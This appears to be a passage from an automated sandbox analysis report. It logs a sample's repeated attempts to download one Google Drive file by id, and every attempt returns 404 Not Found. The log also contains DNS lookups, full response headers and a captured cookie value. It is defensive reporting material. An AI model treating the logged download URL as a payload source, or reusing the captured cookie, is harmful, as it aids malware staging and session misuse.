      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:01 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-oNPDdKAk37_6oigAA74vJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5jf1TaTr9YTTJPToHFfbzYasyfvoHbXluHJrAH5cmUs9ZhDBjVIqFmUuxRHE7rBYv6fwMServer: UploadServerSet-Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF; expires=Fri, 06-Jun-2025 16:03:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:13 GMTContent-Security-Policy: script-src 'nonce-Mmoj_ohssKHKHy5i_yN9cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7-mo0eyhSx3jVfBzA13XnWUgKAUmJuKurAgPVwfzX6ldUm5jmWvaoqHpiL_Z1eCVCcWy8Q5jjyJwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-jfBBg7CqfuES3iRANo0zmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7esx6BrnvM0LaBVwwcbk3EBnvewExtBtZLxpLHAm4ls9aC1kSK0v3ZZft3WNz-XLUjlbMServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qsoCTM7zQRXihrro6J53yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6aCsKJrMqKR-SWJ3Ne4FfW9hoxL195L1n3RcGCE9NcXw2I-vwrlnVBKjt96Xm_Tg9cT9WlmQgINgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7TnWtPbsWZ7wmD8vRnGV0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC5optG5Un4AE1YB_ns3GjnZPPjMsYeraNIJue9hWMqGActRp3nNp3l8WXwX9QovpBY7WEYDDnRwswServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:58 GMTContent-Security-Policy: script-src 'nonce-icaGCId8_gFuSdVpjuZkXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC406yfPXNi0hDG2XfAmUFRhutX9VZPbMO3v_cKFkQUtD3MR5NZuswmQBbI95Yt3njF0DN8rBMljTgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:09 GMTContent-Security-Policy: script-src 'nonce-Bc_2vepgCjqMuBTIqRBnpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4eVvjuM7JnlEacZhEo5fECOFN3i6ig_GkQRtxdJhXATneCuct0yPQ3qOY9tIV5Q2ehUt9ELSoS9wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:20 GMTContent-Security-Policy: script-src 'nonce-dzfoslekdVLnTmyg9QmvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4o1auPodTVc1U8tdZnCmRNEnV4MrVkQZ-F6ewcygyrvkIfkGIwvDZQiE7yr88u0yt91Hh1_GAAGAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:31 GMTContent-Security-Policy: script-src 'nonce-PalheP376nsrsJ1wdhzABQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5wr8Hr-ERYLSKXTQ39aHOvNGQ0UBQg06ByK_MSl9LnSPk7ejRANmOmy9cNXK0zp6kBJ0pgLdl_EAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:42 GMTContent-Security-Policy: script-src 'nonce-dBEiWtpriMk1vP6-CSsLsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5djuB6u451xkPbseAL2Fw74gu2-sYdnhC3ouDL0RL73a4EhlUSBQc4f1IESZpCPmNqgEciUnQ0ngServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
